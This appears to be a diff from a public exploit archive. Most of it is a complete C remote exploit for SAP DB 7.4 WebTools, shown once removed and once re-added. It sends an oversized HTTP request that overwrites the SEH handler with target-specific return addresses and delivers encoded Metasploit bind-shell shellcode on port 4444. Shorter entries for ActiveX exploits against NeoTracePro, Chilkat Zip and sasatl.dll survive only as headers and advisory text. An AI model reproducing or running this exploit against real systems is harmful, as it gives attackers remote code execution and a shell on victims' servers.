-				sscanf(optarg, "%d", &itarget);
-				itarget--;
-				break;
-			case 'p':
-				sscanf(optarg, "%d", &port);
-				break;			
-			default:
-	            usage(argv[0]);
-				WSACleanup();
-			return -1;
-		}		
-	}	
-	if(remotehost == NULL) remotehost=default_remotehost;
-	memset(temp1,0,sizeof(temp1));
-	memset(temp2,0,sizeof(temp2));
-	memset(temp1, '\x20' , 58 - strlen(remotehost) -1);	
-	printf(" #  Host    : %s%s# \n", remotehost, temp1);	
-	sprintf(temp2, "%d", port);
-	memset(temp1,0,sizeof(temp1));
-	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
-	printf(" #  Port    : %s%s# \n", temp2, temp1);
-	memset(temp1,0,sizeof(temp1));	
-	memset(temp2,0,sizeof(temp2));
-	sprintf(temp2, "%s", shellcodes[sh].name );
-	memset(temp1, '\x20' , 58 - strlen(temp2) -1);	
-	printf(" #  Payload : %s%s# \n", temp2, temp1);	
-	if(itarget!=-1)
-	{
-		memset(temp1,0,sizeof(temp1));	
-		memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);	
-		printf(" #  Target  : %s%s# \n", targets[itarget].t, temp1);		
-	}else
-	{
-		memset(temp1,0,sizeof(temp1));	
-		memset(temp1, '\x20' , 58 - strlen("Please select target") -1);	
-		printf(" #  Target  : %s%s# \n", "Please select target", temp1);
-	}
-	printf(" # ------------------------------------------------------------------- # \n");
-	fflush(stdout);
-	printf("   [+] Checking if server is online\n");
-	fflush(stdout);
-	s=do_connect(remotehost, port);   
-	if(s==-1)
-	{
-		printf("   [-] Server is OFFLINE\n");
-		end_logo();
-		return 0;
-	}
-	closesocket(s);
-	printf("   [+] Server is ONLINE\n");
-
-	
-	unsigned char buf[30000];
-	memset(buf,0,sizeof(buf));
-	fflush(stdout);
-	
-	make_buffer(buf, itarget, sh);
-	printf("   [+] Attacking buffer constructed\n");
-	if(send_buffer(buf, remotehost,port)==-1)
-	{
-		printf("   [-] Cannot exploit server %s\n", remotehost);
-		end_logo();
-		WSACleanup();
-		return -1;
-	}
-
-	printf("   [+] Buffer sent\n");
-	printf("   [+] Connect to %s:%d\n", remotehost, 4444);
-	end_logo();
-	WSACleanup();
-	return 0;
-}
-
-
-
-SOCKET do_connect (char *remotehost, int port)
-{
-   static struct hostent *host;
-   static struct sockaddr_in addr;
-   SOCKET s;	
-       host = gethostbyname(remotehost);
-       if (!host)
-       {
-           perror("[-] gethostbyname() failed");
-           return -1;
-       }
-       addr.sin_addr = *(struct in_addr*)host->h_addr;
-
-   s = socket(PF_INET, SOCK_STREAM, 0);
-   if (s == -1)
-   {
-       closesocket(s);
-       perror("socket() failed");
-       return -1;
-   }
-
-   addr.sin_port = htons(port);
-   addr.sin_family = AF_INET;
-
-	if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
-   {
-       closesocket(s);     
-       return -1;
-   }	
-
-   return s;
-}
-
-
-void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh)
-{
-	memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
-	*fshlength = shellcodes[sh].length;	
-}
-
-void make_buffer(unsigned char * buf, int itarget, int sh)
-{
-	// prepare shellcode
-	unsigned char fsh[10000];	
-	unsigned int fshlength;
-	memset(fsh, 0, sizeof(fsh));	
-	prepare_shellcode(fsh, &fshlength, sh);
-	// -----------------
-
-	// make buffer
-	unsigned char * cp=buf;		
-		
-		// HTTP request
-	memcpy(cp, "GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=", strlen("GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE="));
-	cp +=strlen((char *)cp);
-
-		// long request
-	memset(cp, 'A', 20774);
-	cp +=strlen((char *)cp);
-
-		// jmp over 6 bytes
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-	*cp++ = '\xEB';
-	*cp++ = '\x06';
-	
-
-		// SEH handler
-	*cp++ = (char)((targets[itarget].ret      ) & 0xff);
-	*cp++ = (char)((targets[itarget].ret >>  8) & 0xff);
-	*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
-	*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
-
-		// jff
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-	*cp++ = '\x90';
-	
-		// copy shellcode
-	memcpy(cp, fsh, fshlength);
-	cp+=fshlength;
-
-		// end of HTTP request
-	memcpy(cp, " HTTP/1.0\r\n\r\n", strlen(" HTTP/1.0\r\n\r\n"));
-	cp +=strlen((char *)cp);
-	// -----------------
-}
-
-
-
-int send_buffer(unsigned char * buf, char * remotehost, int port)
-{	
-	SOCKET sock;
-	int bytes;
-
-	sock = do_connect(remotehost, port);
-	if(sock==-1) printf("   [-] Failed to connect to server\n");		
-	bytes = send(sock, (char *)buf, (int)strlen((char *)buf), 0);
-	if (bytes<0) printf("   [-] Failed to send the buffer\n"); else printf("   [+] Sent %d bytes\n", bytes);	
-	closesocket(sock);
-	return 1;
-}
-
-
-// -----------------------------------------------------------------
-// XGetopt.cpp  Version 1.2
-// -----------------------------------------------------------------
-int getopt(int argc, char *argv[], char *optstring)
-{
-	static char *next = NULL;
-	if (optind == 0)
-		next = NULL;
-
-	optarg = NULL;
-
-	if (next == NULL || *next == '\0')
-	{
-		if (optind == 0)
-			optind++;
-
-		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
-		{
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		if (strcmp(argv[optind], "--") == 0)
-		{
-			optind++;
-			optarg = NULL;
-			if (optind < argc)
-				optarg = argv[optind];
-			return EOF;
-		}
-
-		next = argv[optind];
-		next++;		// skip past -
-		optind++;
-	}
-
-	char c = *next++;
-	char *cp = strchr(optstring, c);
-
-	if (cp == NULL || c == ':')
-		return '?';
-
-	cp++;
-	if (*cp == ':')
-	{
-		if (*next != '\0')
-		{
-			optarg = next;
-			next = NULL;
-		}
-		else if (optind < argc)
-		{
-			optarg = argv[optind];
-			optind++;
-		}
-		else
-		{
-			return '?';
-		}
-	}
-
-	return c;
-}
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-// -----------------------------------------------------------------
-
-
-void usage(char * s)
-{	
-	printf("   Usage : %s -h  -p  -t \n", s);
-	printf("   Arguments:\n");
-	printf("      -h      host to connect\n");
-	printf("      -p      port (default: 9999)\n");
-	printf("      -t    target to attack\n");
-	printf("    Shellcodes:\n");
-	for(int i=0; shellcodes[i].name!=0;i++)
-	{
-		printf("       %d. %s\n",i+1,shellcodes[i].name);				
-	}	
-	printf("\n");
-	printf("    Targets:\n");
-	for(int j=0; targets[j].t!=0;j++)
-	{
-		printf("       %d. %s\n",j+1,targets[j].t);
-	}		
-	printf("\n");
-	end_logo();	
-}
-
-void logo()
-{
-	printf("\n\n");
-	printf(" ####################################################################### \n");	
-	printf(" #     ____                 __  _                  ______  __    _____ #\n");
-	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
-	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
-	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
-	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
-	printf(" #                                 crew                                #\n");
-	printf(" ####################################################################### \n");	
-	printf(" #  Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit         # \n");
-	printf(" #  Author  : Heretic2 (heretic2x@gmail.com                            # \n");
-	printf(" #  Research: NGSSoftware Insight Security Research                    # \n");
-	printf(" #  Version : 1.0 Public Release                                       # \n");
-	printf(" #  System  : Windows 2000 ALL SP                                      # \n");
-	printf(" #  Date    : 07.07.2007                                               # \n");
-	printf(" # ------------------------------------------------------------------- # \n");
-}
-
-void end_logo()
-{
-	printf(" # ------------------------------------------------------------------- # \n");
-	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
-	printf(" ####################################################################### \n\n");
-}
-
-// milw0rm.com [2007-07-07]
+/* Dreatica-FXP crew
+* 
+* ----------------------------------------
+* Target         : SAP DB 7.4 WebTools 
+* Site           : http://www.sapdb.org
+* Found by       : NGSSoftware Insight Security Research 
+* ----------------------------------------
+* Exploit        : SAP DB 7.4 WebTools Remote SEH overwrite exploit
+* Exploit date   : 07.07.2007
+* Exploit writer : Heretic2 (heretic2x@gmail.com)
+* OS             : Windows 2000 ALL SP 
+* Crew           : Dreatica-FXP
+* ----------------------------------------
+* Info           :   This is the SEH overwrite realization of the vulnerability found by 
+*                  NGSSoftware Insight Security Research, it is trivial. We send a big amount
+*                  of bytes to server (about 20000) and overwrite SEH. Aproximatly at the 9900
+*                  byte we trigger an exception and our shellcode is executed.
+* ----------------------------------------
+* Compiling      :
+*  To compile this exploit you need:
+*    1. Windows C/C++ compiler   
+*    2. WinSock 2
+* ----------------------------------------
+* Thanks to      :
+*       1. NGSSoftware Insight Security Research ( http://www.ngssoftware.com/ )
+*       2. The Metasploit project                ( http://metasploit.com       ) 
+*       3. Dreatica-FXP crew                     ( http://www.dreatica.cl      )
+* ----------------------------------------
+* This exploit was written for educational purpose only. Use it at your own risk. Author will be not be 
+* responsible for any damage, caused by that code.
+************************************************************************************
+*/
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#pragma comment(lib,"ws2_32")
+
+
+void usage(char * s);
+void logo();
+void end_logo();
+void prepare_shellcode(unsigned char * fsh, int sh);
+void make_buffer(unsigned char * buf, int itarget, int sh);
+int send_buffer(unsigned char * buf, char * remotehost, int port);
+SOCKET do_connect (char *remotehost, int port);
+int alphanumeric_encoder_thx_to_skylined(char *to_encode, char *encoded );
+
+static long timeout = 2000 ; // 2 sec
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring);
+char	*optarg;		// global argument pointer
+int		optind = 0, opterr; 	// global argv index
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+
+struct _target{
+	const char *t ;
+	unsigned long ret ;
+} targets[]=
+	{
+		{"UNIVERSAL: SAP DB 7.4.3 [WAPI.dll]",          0x1003a218 },// call ebx
+		{"Windows 2000 Pro SP4 RUSSIAN [kernel32.dll]", 0x793a4a66 },// jmp ebx
+		{"Windows 2000 Pro SP4 ENGLISH [kernel32.dll]", 0x7c4e4a66 },// jmp ebx
+		{"Debug / DoS",                                 0x42424242 },
+		{NULL,                                          0x00000000 }
+	};
+
+
+struct {
+	const char * name;
+	int length;
+	char * shellcode;	
+}shellcodes[]={ 	
+	 {"Bindshell, port 4444   [ args: none ]", 696, 
+		 /* win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
+		"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x37\x49\x49\x49"
+		"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
+		"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x52\x42\x32\x42\x41\x32"
+		"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x6a\x49\x4b\x4c\x62"
+		"\x4a\x68\x6b\x30\x4d\x59\x78\x49\x69\x4b\x4f\x79\x6f\x69\x6f\x71"
+		"\x70\x4e\x6b\x32\x4c\x51\x34\x64\x64\x6e\x6b\x41\x55\x77\x4c\x4c"
+		"\x4b\x71\x6c\x35\x55\x64\x38\x54\x41\x58\x6f\x4c\x4b\x30\x4f\x47"
+		"\x68\x4e\x6b\x53\x6f\x47\x50\x74\x41\x58\x6b\x70\x49\x4c\x4b\x35"
+		"\x64\x6c\x4b\x36\x61\x68\x6e\x57\x41\x79\x50\x6f\x69\x4c\x6c\x6c"
+		"\x44\x4b\x70\x63\x44\x43\x37\x5a\x61\x78\x4a\x44\x4d\x36\x61\x6a"
+		"\x62\x38\x6b\x78\x74\x77\x4b\x51\x44\x74\x64\x76\x48\x51\x65\x4a"
+		"\x45\x4e\x6b\x73\x6f\x61\x34\x55\x51\x5a\x4b\x71\x76\x6c\x4b\x64"
+		"\x4c\x72\x6b\x4e\x6b\x63\x6f\x57\x6c\x75\x51\x7a\x4b\x33\x33\x34"
+		"\x6c\x6c\x4b\x6e\x69\x72\x4c\x45\x74\x45\x4c\x30\x61\x4f\x33\x50"
+		"\x31\x69\x4b\x61\x74\x6c\x4b\x57\x33\x66\x50\x4e\x6b\x43\x70\x64"
+		"\x4c\x6e\x6b\x32\x50\x65\x4c\x6e\x4d\x6e\x6b\x77\x30\x67\x78\x31"
+		"\x4e\x33\x58\x6c\x4e\x30\x4e\x34\x4e\x5a\x4c\x50\x50\x4b\x4f\x69"
+		"\x46\x72\x46\x62\x73\x70\x66\x35\x38\x57\x43\x35\x62\x45\x38\x30"
+		"\x77\x63\x43\x44\x72\x71\x4f\x71\x44\x79\x6f\x4a\x70\x73\x58\x78"
+		"\x4b\x48\x6d\x4b\x4c\x77\x4b\x56\x30\x79\x6f\x7a\x76\x51\x4f\x6f"
+		"\x79\x79\x75\x32\x46\x4b\x31\x48\x6d\x43\x38\x45\x52\x70\x55\x73"
+		"\x5a\x33\x32\x6b\x4f\x4a\x70\x72\x48\x69\x49\x36\x69\x4c\x35\x6e"
+		"\x4d\x50\x57\x4b\x4f\x6a\x76\x36\x33\x36\x33\x61\x43\x33\x63\x62"
+		"\x73\x43\x73\x36\x33\x50\x43\x63\x63\x4b\x4f\x68\x50\x43\x56\x71"
+		"\x78\x62\x31\x51\x4c\x30\x66\x30\x53\x6b\x39\x78\x61\x4c\x55\x65"
+		"\x38\x4e\x44\x67\x6a\x74\x30\x6f\x37\x70\x57\x69\x6f\x6e\x36\x32"
+		"\x4a\x36\x70\x43\x61\x32\x75\x79\x6f\x4e\x30\x50\x68\x4f\x54\x6e"
+		"\x4d\x64\x6e\x6d\x39\x52\x77\x79\x6f\x58\x56\x66\x33\x36\x35\x69"
+		"\x6f\x4e\x30\x45\x38\x38\x65\x72\x69\x6b\x36\x77\x39\x33\x67\x79"
+		"\x6f\x6e\x36\x70\x50\x31\x44\x62\x74\x73\x65\x6b\x4f\x58\x50\x6d"
+		"\x43\x50\x68\x4b\x57\x44\x39\x4f\x36\x64\x39\x71\x47\x6b\x4f\x49"
+		"\x46\x63\x65\x6b\x4f\x4a\x70\x71\x76\x50\x6a\x50\x64\x50\x66\x70"
+		"\x68\x50\x63\x52\x4d\x6e\x69\x58\x65\x32\x4a\x46\x30\x63\x69\x45"
+		"\x79\x48\x4c\x4c\x49\x7a\x47\x63\x5a\x70\x44\x4d\x59\x78\x62\x36"
+		"\x51\x39\x50\x38\x73\x4f\x5a\x6b\x4e\x41\x52\x64\x6d\x6b\x4e\x32"
+		"\x62\x36\x4c\x4e\x73\x4c\x4d\x43\x4a\x34\x78\x4c\x6b\x6e\x4b\x6e"
+		"\x4b\x51\x78\x70\x72\x6b\x4e\x4e\x53\x47\x66\x4b\x4f\x32\x55\x50"
+		"\x44\x4b\x4f\x7a\x76\x43\x6b\x70\x57\x62\x72\x46\x31\x66\x31\x32"
+		"\x71\x30\x6a\x35\x51\x33\x61\x32\x71\x33\x65\x53\x61\x4b\x4f\x5a"
+		"\x70\x30\x68\x6e\x4d\x6e\x39\x73\x35\x7a\x6e\x62\x73\x4b\x4f\x48"
+		"\x56\x63\x5a\x6b\x4f\x59\x6f\x57\x47\x39\x6f\x6e\x30\x4e\x6b\x30"
+		"\x57\x59\x6c\x4b\x33\x38\x44\x45\x34\x59\x6f\x39\x46\x50\x52\x39"
+		"\x6f\x58\x50\x65\x38\x38\x70\x6e\x6a\x37\x74\x53\x6f\x31\x43\x6b"
+		"\x4f\x6a\x76\x6b\x4f\x78\x50\x42"		
+	 },	 
+	{NULL , NULL }
+};
+
+
+
+int main(int argc, char **argv)
+{
+	char * remotehost=NULL;
+	char default_remotehost[]="127.0.0.1";
+	char temp1[100], temp2[100];
+	int port, itarget, sh;
+	SOCKET s;
+	char c;	
+	int option_index=0;
+	logo();
+	WSADATA wsa;
+	WSAStartup(MAKEWORD(2,0), &wsa);
+	if(argc<2)
+	{
+		usage(argv[0]);		
+		return -1;
+	}
+
+	// set defaults
+	port=9999;
+	itarget=-1;
+	sh=0;
+	// ------------	
+	
+	while((c = getopt(argc, argv, "h:p:t:"))!= EOF)
+	{
+		switch (c)
+		{
+			case 'h':
+				remotehost=optarg;
+				break; 	
+			case 't':
+				sscanf(optarg, "%d", &itarget);
+				itarget--;
+				break;
+			case 'p':
+				sscanf(optarg, "%d", &port);
+				break;			
+			default:
+	            usage(argv[0]);
+				WSACleanup();
+			return -1;
+		}		
+	}	
+	if(remotehost == NULL) remotehost=default_remotehost;
+	memset(temp1,0,sizeof(temp1));
+	memset(temp2,0,sizeof(temp2));
+	memset(temp1, '\x20' , 58 - strlen(remotehost) -1);	
+	printf(" #  Host    : %s%s# \n", remotehost, temp1);	
+	sprintf(temp2, "%d", port);
+	memset(temp1,0,sizeof(temp1));
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);
+	printf(" #  Port    : %s%s# \n", temp2, temp1);
+	memset(temp1,0,sizeof(temp1));	
+	memset(temp2,0,sizeof(temp2));
+	sprintf(temp2, "%s", shellcodes[sh].name );
+	memset(temp1, '\x20' , 58 - strlen(temp2) -1);	
+	printf(" #  Payload : %s%s# \n", temp2, temp1);	
+	if(itarget!=-1)
+	{
+		memset(temp1,0,sizeof(temp1));	
+		memset(temp1, '\x20' , 58 - strlen(targets[itarget].t) -1);	
+		printf(" #  Target  : %s%s# \n", targets[itarget].t, temp1);		
+	}else
+	{
+		memset(temp1,0,sizeof(temp1));	
+		memset(temp1, '\x20' , 58 - strlen("Please select target") -1);	
+		printf(" #  Target  : %s%s# \n", "Please select target", temp1);
+	}
+	printf(" # ------------------------------------------------------------------- # \n");
+	fflush(stdout);
+	printf("   [+] Checking if server is online\n");
+	fflush(stdout);
+	s=do_connect(remotehost, port);   
+	if(s==-1)
+	{
+		printf("   [-] Server is OFFLINE\n");
+		end_logo();
+		return 0;
+	}
+	closesocket(s);
+	printf("   [+] Server is ONLINE\n");
+
+	
+	unsigned char buf[30000];
+	memset(buf,0,sizeof(buf));
+	fflush(stdout);
+	
+	make_buffer(buf, itarget, sh);
+	printf("   [+] Attacking buffer constructed\n");
+	if(send_buffer(buf, remotehost,port)==-1)
+	{
+		printf("   [-] Cannot exploit server %s\n", remotehost);
+		end_logo();
+		WSACleanup();
+		return -1;
+	}
+
+	printf("   [+] Buffer sent\n");
+	printf("   [+] Connect to %s:%d\n", remotehost, 4444);
+	end_logo();
+	WSACleanup();
+	return 0;
+}
+
+
+
+SOCKET do_connect (char *remotehost, int port)
+{
+   static struct hostent *host;
+   static struct sockaddr_in addr;
+   SOCKET s;	
+       host = gethostbyname(remotehost);
+       if (!host)
+       {
+           perror("[-] gethostbyname() failed");
+           return -1;
+       }
+       addr.sin_addr = *(struct in_addr*)host->h_addr;
+
+   s = socket(PF_INET, SOCK_STREAM, 0);
+   if (s == -1)
+   {
+       closesocket(s);
+       perror("socket() failed");
+       return -1;
+   }
+
+   addr.sin_port = htons(port);
+   addr.sin_family = AF_INET;
+
+	if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)
+   {
+       closesocket(s);     
+       return -1;
+   }	
+
+   return s;
+}
+
+
+void prepare_shellcode(unsigned char * fsh, unsigned int * fshlength, int sh)
+{
+	memcpy(fsh, shellcodes[sh].shellcode, shellcodes[sh].length);
+	*fshlength = shellcodes[sh].length;	
+}
+
+void make_buffer(unsigned char * buf, int itarget, int sh)
+{
+	// prepare shellcode
+	unsigned char fsh[10000];	
+	unsigned int fshlength;
+	memset(fsh, 0, sizeof(fsh));	
+	prepare_shellcode(fsh, &fshlength, sh);
+	// -----------------
+
+	// make buffer
+	unsigned char * cp=buf;		
+		
+		// HTTP request
+	memcpy(cp, "GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE=", strlen("GET /webdbm?Event=DBM_INTERN_TEST&Action=REFRESH&HTTP_COOKIE="));
+	cp +=strlen((char *)cp);
+
+		// long request
+	memset(cp, 'A', 20774);
+	cp +=strlen((char *)cp);
+
+		// jmp over 6 bytes
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\xEB';
+	*cp++ = '\x06';
+	
+
+		// SEH handler
+	*cp++ = (char)((targets[itarget].ret      ) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >>  8) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
+	*cp++ = (char)((targets[itarget].ret >> 24) & 0xff);
+
+		// jff
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	*cp++ = '\x90';
+	
+		// copy shellcode
+	memcpy(cp, fsh, fshlength);
+	cp+=fshlength;
+
+		// end of HTTP request
+	memcpy(cp, " HTTP/1.0\r\n\r\n", strlen(" HTTP/1.0\r\n\r\n"));
+	cp +=strlen((char *)cp);
+	// -----------------
+}
+
+
+
+int send_buffer(unsigned char * buf, char * remotehost, int port)
+{	
+	SOCKET sock;
+	int bytes;
+
+	sock = do_connect(remotehost, port);
+	if(sock==-1) printf("   [-] Failed to connect to server\n");		
+	bytes = send(sock, (char *)buf, (int)strlen((char *)buf), 0);
+	if (bytes<0) printf("   [-] Failed to send the buffer\n"); else printf("   [+] Sent %d bytes\n", bytes);	
+	closesocket(sock);
+	return 1;
+}
+
+
+// -----------------------------------------------------------------
+// XGetopt.cpp  Version 1.2
+// -----------------------------------------------------------------
+int getopt(int argc, char *argv[], char *optstring)
+{
+	static char *next = NULL;
+	if (optind == 0)
+		next = NULL;
+
+	optarg = NULL;
+
+	if (next == NULL || *next == '\0')
+	{
+		if (optind == 0)
+			optind++;
+
+		if (optind >= argc || argv[optind][0] != '-' || argv[optind][1] == '\0')
+		{
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		if (strcmp(argv[optind], "--") == 0)
+		{
+			optind++;
+			optarg = NULL;
+			if (optind < argc)
+				optarg = argv[optind];
+			return EOF;
+		}
+
+		next = argv[optind];
+		next++;		// skip past -
+		optind++;
+	}
+
+	char c = *next++;
+	char *cp = strchr(optstring, c);
+
+	if (cp == NULL || c == ':')
+		return '?';
+
+	cp++;
+	if (*cp == ':')
+	{
+		if (*next != '\0')
+		{
+			optarg = next;
+			next = NULL;
+		}
+		else if (optind < argc)
+		{
+			optarg = argv[optind];
+			optind++;
+		}
+		else
+		{
+			return '?';
+		}
+	}
+
+	return c;
+}
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+// -----------------------------------------------------------------
+
+
+void usage(char * s)
+{	
+	printf("   Usage : %s -h  -p  -t \n", s);
+	printf("   Arguments:\n");
+	printf("      -h      host to connect\n");
+	printf("      -p      port (default: 9999)\n");
+	printf("      -t    target to attack\n");
+	printf("    Shellcodes:\n");
+	for(int i=0; shellcodes[i].name!=0;i++)
+	{
+		printf("       %d. %s\n",i+1,shellcodes[i].name);				
+	}	
+	printf("\n");
+	printf("    Targets:\n");
+	for(int j=0; targets[j].t!=0;j++)
+	{
+		printf("       %d. %s\n",j+1,targets[j].t);
+	}		
+	printf("\n");
+	end_logo();	
+}
+
+void logo()
+{
+	printf("\n\n");
+	printf(" ####################################################################### \n");	
+	printf(" #     ____                 __  _                  ______  __    _____ #\n");
+	printf(" #    / __ \\________  _____/ /_(_)_________       / __/\\ \\/ /   / _  / #\n");
+	printf(" #   / / / / ___/ _ \\/ __ / __/ / ___/ __ / ___  / /    \\  /   / // /  #\n");
+	printf(" #  / /_/ / / /  ___/ /_// /_/ / /__/ /_// /__/ / _/    /  \\  / ___/   #\n");
+	printf(" # /_____/_/  \\___/ \\_,_/\\__/_/\\___/\\__,_/     /_/     /_/\\_\\/_/       #\n");
+	printf(" #                                 crew                                #\n");
+	printf(" ####################################################################### \n");	
+	printf(" #  Exploit : SAP DB 7.4 WebTools Remote SEH overwrite exploit         # \n");
+	printf(" #  Author  : Heretic2 (heretic2x@gmail.com                            # \n");
+	printf(" #  Research: NGSSoftware Insight Security Research                    # \n");
+	printf(" #  Version : 1.0 Public Release                                       # \n");
+	printf(" #  System  : Windows 2000 ALL SP                                      # \n");
+	printf(" #  Date    : 07.07.2007                                               # \n");
+	printf(" # ------------------------------------------------------------------- # \n");
+}
+
+void end_logo()
+{
+	printf(" # ------------------------------------------------------------------- # \n");
+	printf(" #                    Dreatica-FXP crew [Heretic2]                     # \n");	
+	printf(" ####################################################################### \n\n");
+}
+
+// milw0rm.com [2007-07-07]
diff --git a/platforms/windows/remote/4158.html b/platforms/windows/remote/4158.html
index ffd78b96f..a4218333d 100755
--- a/platforms/windows/remote/4158.html
+++ b/platforms/windows/remote/4158.html
@@ -1,129 +1,129 @@
-
-
-
-       
-               
-                       NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit
-               
-       
-
-       
-               
    
-
-               
-
-               /**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE  *** PRIVATE ****/

    
-               NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit
    
-               by nitr0us
    
-               www.genexx.org/nitrous/

    
-
-               
-
-               
-               
    
-       
-
-
-# milw0rm.com [2007-07-07]
+
+
+
+       
+               
+                       NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit
+               
+       
+
+       
+               
    
+
+               
+
+               /**** PRIVATE *** DON'T DISTRIBUTE *** PRIVATE *** DON'T DISTRIBUTE  *** PRIVATE ****/

    
+               NeoTracePro 3.25 ActiveX Control "TraceTarget()" b0f [NeoTraceExplorer.dll] Remote 0-day Exploit
    
+               by nitr0us
    
+               www.genexx.org/nitrous/

    
+
+               
+
+               
+               
    
+       
+
+
+# milw0rm.com [2007-07-07]
diff --git a/platforms/windows/remote/4160.html b/platforms/windows/remote/4160.html
index c895a7c12..5aae0ace1 100755
--- a/platforms/windows/remote/4160.html
+++ b/platforms/windows/remote/4160.html
@@ -1,38 +1,38 @@
-
    -------------------------------------------------------------------------------
- Chilkat Software Chilkat Zip ActiveX Component (ChilkatZip2.dll v. 12.4.2.0)
- "SaveLastError()" and "WriteExe()" Insecure Methods
- 
- url: http://www.chilkatsoft.com/
-
- author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
- 
- This was written for educational purpose. Use it at your own risk.
- Author will be not be responsible for any damage.
- 
- THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
- IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
-
- This control is marked as:
- RegKey Safe for Script: False
- RegKey Safe for Init: False
- Implements IObjectSafety: True
- IDisp Safe: Safe for untrusted: caller, data
- IPersist Safe: Safe for untrusted: caller, data
- IPStorage Safe: Safe for untrusted: caller, data
- KillBitSet: Falso
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-------------------------------------------------------------------------------
-
-
-
-
-
    
-
-# milw0rm.com [2007-07-07]
+
    +------------------------------------------------------------------------------
+ Chilkat Software Chilkat Zip ActiveX Component (ChilkatZip2.dll v. 12.4.2.0)
+ "SaveLastError()" and "WriteExe()" Insecure Methods
+ 
+ url: http://www.chilkatsoft.com/
+
+ author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+ 
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not be responsible for any damage.
+ 
+ THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
+ IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
+
+ This control is marked as:
+ RegKey Safe for Script: False
+ RegKey Safe for Init: False
+ Implements IObjectSafety: True
+ IDisp Safe: Safe for untrusted: caller, data
+ IPersist Safe: Safe for untrusted: caller, data
+ IPStorage Safe: Safe for untrusted: caller, data
+ KillBitSet: Falso
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+------------------------------------------------------------------------------
+
+
+
+
+
    
+
+# milw0rm.com [2007-07-07]
diff --git a/platforms/windows/remote/4170.html b/platforms/windows/remote/4170.html
index cac448f07..921874723 100755
--- a/platforms/windows/remote/4170.html
+++ b/platforms/windows/remote/4170.html
@@ -1,119 +1,119 @@
-:. GOODFELLAS Security Research TEAM  .:
-:. http://goodfellas.shellcode.com.ar .:
-
-sasatl.dll 1.5.0.531 Program Checker -  Javascript Heap Spraying Exploit
-========================================================================
-
-Internal ID: VULWAR200706280.
-
-
-Introduction
-------------
-sasatl.dll is a library included in the Program Checker Pro software package from the Zenturi. http://www.programchecker.com
-
-
-Tested In
----------
-- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0.
-- Windows vista Professional English/French SP1 with IE 7.0
-
-
-Summary
--------
-The Fill method is prone to a stack-based buffer-overflow vulnerability because it fails to properly check boundaries.
-
-
-Impact
-------
-An attacker could execute arbitrary code into the remote machine.
-
-
-Workaround
-----------
-- Activate the Kill bit zero in clsid:7D6B5B29-FC7E-11D1-9288-00104B885781.
-- Unregister sasatl.dll using regsvr32.
-
-
-Timeline
---------
-July 10, 2007 -- Exploit published.
-
-
-Credits
--------
- * callAX 
- * GoodFellas Security Research Team 
-
-Proof of Concept
-----------------
-
-
-
-  
-
-
-
-
-
-
-# milw0rm.com [2007-07-10]
+:. GOODFELLAS Security Research TEAM  .:
